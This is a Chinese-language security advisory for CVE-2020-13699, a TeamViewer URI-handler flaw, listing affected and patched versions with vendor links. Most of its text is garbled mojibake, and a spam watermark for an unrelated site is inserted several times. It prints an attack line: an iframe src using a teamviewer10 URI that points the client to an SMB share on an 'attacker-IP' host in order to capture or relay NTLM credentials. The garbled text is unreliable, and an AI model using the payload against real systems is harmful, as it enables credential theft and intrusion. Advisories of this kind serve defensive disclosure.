CVE-2020-13699 | TeamViewerÇå¾²Îó²îͨ¸æ

Ðû²¼Ê±¼ä 2020-08-09

0x00 Îó²î¸ÅÊö


CVE   ID
CVE-2020-13699
ʱ    ¼ä
2020-08-09
Àà    ÐÍ

µÈ    ¼¶
¸ßΣ
Ô¶³ÌʹÓÃ
ÊÇ
Ó°Ïì¹æÄ£
TeamViewer 8,9, 10,11,12,13,14,15°æ±¾

0x01 Îó²îÏêÇé


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


¿ËÈÕ£¬£¬£¬£¬£¬£¬£¬TeamViewerÐû²¼Ç徲ͨ¸æ£¬£¬£¬£¬£¬£¬£¬ÐÞ¸´ÁËÒ»¸öÎó²î£¨CVE-2020-13699£©¡£ ¡£¡£¡£¡£¸ÃÎó²îÔ´ÓÚ³ÌÐòÎÞ·¨×¼È·ÒýÓÃÆä×Ô½ç˵URI´¦Öóͷ£³ÌÐò£¬£¬£¬£¬£¬£¬£¬µ¼Ö¹¥»÷Õß¿ÉÆð¶¯TeamViewer²¢Ö´ÐÐí§Òâ´úÂë»ò»ñµÃÃÜÂë¹þÏ£¡£ ¡£¡£¡£¡£

ҪʹÓøÃÎó²î£¬£¬£¬£¬£¬£¬£¬Óû§ÐèÒªä¯ÀÀµ½Ò»¸ö¶ñÒâÒ³Ãæ£¬£¬£¬£¬£¬£¬£¬¸Ã¶ñÒâÒ³Ãæ»áÔÚÆäWebä¯ÀÀÆ÷ÖмÓÔØiframe¡£ ¡£¡£¡£¡£¹¥»÷Õ߻ὫiframeµÄsrc ÊôÐÔÉèÖÃΪ

'teamviewer10£º--play \\ attacker-IP \ share \ fake.tvs'


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


´ËÏÂÁîÌåÏÖÍâµØ×°ÖõÄTeamViewerÓ¦ÓóÌÐòͨ¹ýЧÀÍÆ÷ÐÂÎſ飨SMB£©Ð­ÒéÅþÁ¬µ½¹¥»÷ÕßµÄЧÀÍÆ÷¡£ ¡£¡£¡£¡£ ¹¥»÷ÕßʹÓÃÈ«ÐÄÖÆ×÷µÄURL½«¶ñÒâiframeǶÈëÍøÕ¾ÖУ¬£¬£¬£¬£¬£¬£¬¸ÃURL »áÆô¶¯TeamViewer Windows×ÀÃæ¿Í»§¶Ë²¢ÆÈʹÆä·­¿ªÔ¶³ÌSMB¹²Ïí¡£ ¡£¡£¡£¡£

ÓÉÓÚÊÇÊܺ¦ÕßµÄÅÌËã»úÌᳫÓë¹¥»÷ÕßµÄSMB¹²ÏíÅþÁ¬£¬£¬£¬£¬£¬£¬£¬Òò´Ë¹¥»÷Õß²»ÐèÒªÖªµÀÓû§µÄÃÜÂ룬£¬£¬£¬£¬£¬£¬¿É×Ô¶¯Í¨¹ýÉí·ÝÑéÖ¤²¢»ñµÃ»á¼ûȨÏÞ¡£ ¡£¡£¡£¡£

Ñо¿Ö°Ô±ÌåÏÖ£º¡°WindowsÔÚ·­¿ªSMB¹²Ïíʱ½«Ö´ÐÐNTLMÉí·ÝÑéÖ¤£¬£¬£¬£¬£¬£¬£¬²¢ÇÒ¿ÉÒÔת·¢¸ÃÇëÇóÒÔÖ´ÐдúÂë¡£ ¡£¡£¡£¡£¡±Õâ»áÓ°ÏìURI´¦Öóͷ£³ÌÐòteamviewer10¡¢teamviewer8¡¢teamviewerapi¡¢tvchat1¡¢tvcontrol1¡¢tvfiletransfer1¡¢tvjoinv8¡¢tvpresent1¡¢tvsendfile1¡¢tvsqcustomer1¡¢tvsqsupport1¡¢tvvideocall1ºÍtvvpn1¡£ ¡£¡£¡£¡£


0x02 ´¦Öóͷ£½¨Òé


ÏÖÔÚ³§ÉÌÒÑÐû²¼²¹¶¡£¬£¬£¬£¬£¬£¬£¬WindowsµÄTeamViewerÓû§Ó¦Ë¼Á¿Éý¼¶µ½ÐµijÌÐò°æ±¾£¬£¬£¬£¬£¬£¬£¬ÆäÖаüÀ¨£º8.0.258861¡¢9.0.28860¡¢10.0.258873¡¢11.0.258870¡¢12.0.258869¡¢13.2.36220¡¢14.2.56676¡¢14.7.48350¡¢15.8.3¡£ ¡£¡£¡£¡£ÏÂÔØÁ´½Ó£º

https://www.teamviewer.cn/cn/download/windows/


0x03 Ïà¹ØÐÂÎÅ


https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/


0x04 ²Î¿¼Á´½Ó


https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448


0x05 ʱ¼äÏß


2020-08-09 VSRCÐû²¼Îó²îͨ¸æ



¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨